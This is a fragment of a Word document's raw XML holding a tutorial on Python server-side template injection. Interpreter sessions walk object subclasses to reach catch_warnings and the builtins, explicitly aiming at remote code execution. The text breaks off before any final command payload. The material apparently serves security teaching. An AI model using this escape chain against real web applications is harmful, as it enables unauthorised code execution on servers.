          <w:lang w:val="it-IT"/>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'isascii', 'isdecimal', 'isdigit', 'isidentifier', 'islower', 'isnumeric', 'isprintable', 'isspace', 'istitle', 'isupper', 'join', 'ljust', 'lower', 'lstrip', 'maketrans', 'partition', 'replace', 'rfind', 'rindex', 'rjust', 'rpartition', 'rsplit', 'rstrip', 'split', 'splitlines', 'startswith', 'strip', 'swapcase', 'title', 'translate', 'upper', 'zfill']</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="2394AF92" wp14:textId="60BA8260">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>The next step is to understand Python's hierarchy. Using __mro__ or mro(), we can go back up the tree of inherited objects in the Python environment. Let's practice this as follows.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="1E0F4AC2" wp14:textId="3782286E">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22D4FA9A" wp14:textId="6F2E195C">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&gt;&gt;&gt; s.__class__.__class__</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;class 'type'&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; s.__class__.__base__</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;class 'object'&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; s.__class__.__base__.__subclasses__()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[&lt;class 'type'&gt;, &lt;class 'weakref'&gt;, &lt;class 'weakcallableproxy'&gt;, &lt;class 'weakproxy'&gt;, &lt;class 'int'&gt;, &lt;class 'bytearray'&gt;, &lt;class 'bytes'&gt;, &lt;class 'list'&gt;, &lt;class 'NoneType'&gt;, &lt;class 'NotImplementedType'&gt;, &lt;class 'traceback'&gt;, &lt;class 'super'&gt;, &lt;class 'range'&gt;, &lt;class 'dict'&gt;, &lt;class 'dict_keys'&gt;, &lt;class 'dict_values'&gt;, &lt;class 'dict_items'&gt;, &lt;class 'dict_reversekeyiterator'&gt;, &lt;class 'dict_reversevalueiterator'&gt;, &lt;class 'dict_reverseitemiterator'&gt;, &lt;class 'odict_iterator'&gt;, &lt;class 'set'&gt;, &lt;class 'str'&gt;, &lt;class 'slice'&gt;, &lt;class 'staticmethod'&gt;, &lt;class 'complex'&gt;, &lt;class 'float'&gt;, &lt;class 'frozenset'&gt;, &lt;class 'property'&gt;, &lt;class 'managedbuffer'&gt;, &lt;class 'memoryview'&gt;, &lt;class 'tuple'&gt;, &lt;class 'enumerate'&gt;, &lt;class 'reversed'&gt;, &lt;class 'stderrprinter'&gt;, &lt;class 'code'&gt;, &lt;class 'frame'&gt;, &lt;class 'builtin_function_or_method'&gt;, &lt;class 'method'&gt;,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;SNIP&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; s.__class__.mro()[1].__subclasses__()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[&lt;class 'type'&gt;, &lt;class 'weakref'&gt;, &lt;class 'weakcallableproxy'&gt;, &lt;class 'weakproxy'&gt;, &lt;class 'int'&gt;, &lt;class 'bytearray'&gt;, &lt;class 'bytes'&gt;, &lt;class 'list'&gt;, &lt;class 'NoneType'&gt;, &lt;class 'NotImplementedType'&gt;, &lt;class 'traceback'&gt;, &lt;class 'super'&gt;, &lt;class 'range'&gt;, &lt;class 'dict'&gt;, &lt;class 'dict_keys'&gt;, &lt;class 'dict_values'&gt;, &lt;class 'dict_items'&gt;, &lt;class 'dict_reversekeyiterator'&gt;, &lt;class 'dict_reversevalueiterator'&gt;, &lt;class 'dict_reverseitemiterator'&gt;, &lt;class 'odict_iterator'&gt;, &lt;class 'set'&gt;, &lt;class 'str'&gt;, &lt;class 'slice'&gt;, &lt;class 'staticmethod'&gt;, &lt;class 'complex'&gt;, &lt;class 'float'&gt;, &lt;class 'frozenset'&gt;, &lt;class 'property'&gt;, &lt;class 'managedbuffer'&gt;, &lt;class 'memoryview'&gt;, &lt;class 'tuple'&gt;, &lt;class 'enumerate'&gt;, &lt;class 'reversed'&gt;, &lt;class 'stderrprinter'&gt;, &lt;class 'code'&gt;, &lt;class 'frame'&gt;, &lt;class 'builtin_function_or_method'&gt;, &lt;class 'method'&gt;,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;SNIP&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="44355364" wp14:textId="05D13710">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Now, let us look for useful classes that can facilitate remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="7CEF4A41" wp14:textId="048A63C7">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08C8399B" wp14:textId="68FEB779">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&gt;&gt;&gt; x = s.__class__.mro()[1].__subclasses__()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; for i in range(len(x)):print(i, x[i].__name__)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>0 type</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>1 weakref</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>2 weakcallableproxy</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>3 weakproxy</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>4 int</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>5 bytearray</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>6 bytes</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>7 list</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>8 NoneType</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;SNIP&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; def searchfunc(name):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>...     x = s.__class__.mro()[1].__subclasses__()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>...     for i in range(len(x)):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>...             fn = x[i].__name__</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>...             if fn.find(name) &gt; -1:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>...                     print(i, fn)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; searchfunc('warning')</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>215 catch_warnings</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="43397865" wp14:textId="3CB28299">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Why are we searching for warning you may ask. We chose this class because it imports Python's </w:t>
      </w:r>
      <w:hyperlink w:anchor="L3" r:id="Re1c8c6f03d8c4bcc">
        <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>sys module</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> , and from sys, the os module can be reached. More precisely, os modules are all from warnings.catch_.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="59E2DEA8" wp14:textId="3B363D21">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Please note that you will probably come across a different number. Back to our Python for SSTI specifics, we have seen that catch_warnings is present without importing any additional module to our Python console. Let's enumerate the builtins from this class as follows.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="66E776F2" wp14:textId="37F786D1">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4C51AD7B" wp14:textId="1C8754E2">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&gt;&gt;&gt; y = x[215]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; y</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;class 'warnings.catch_warnings'&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; y()._module.__builtins__</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>{'__name__': 'builtins', '__doc__': "Built-in functions, exceptions, and other objects.\n\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.", '__package__': '', '__loader__': &lt;class '_frozen_importlib.BuiltinImporter'&gt;, '__spec__': ModuleSpec(name='builtins', loader=&lt;class '_frozen_importlib.BuiltinImporter'&gt;), '__build_class__': &lt;built-in function __build_class__&gt;, '__import__': &lt;built-in function __import__&gt;, 'abs': &lt;built-in function abs&gt;, 'all': &lt;built-in function all&gt;, 'any': &lt;built-in function any&gt;, 'ascii': &lt;built-in function ascii&gt;, 'bin': &lt;built-in function bin&gt;, 'breakpoint': &lt;built-in function breakpoint&gt;, 'callable': &lt;built-in function callable&gt;, 'chr': &lt;built-in function chr&gt;, 'compile': &lt;built-in function compile&gt;, 'delattr': &lt;built-in function delattr&gt;, 'dir': &lt;built-in function dir&gt;, 'divmod': &lt;built-in function divmod&gt;, 'eval': &lt;built-in function eval&gt;, 'exec': &lt;built-in function exec&gt;, 'format': &lt;built-in function format&gt;, 'getattr': &lt;built-in function getattr&gt;, 'globals': &lt;built-in function globals&gt;,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;SNIP&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; z = y()._module.__builtins__</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; for i in z:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>...     if i.find('import') &gt;-1:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>...             print(i, z[i])</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
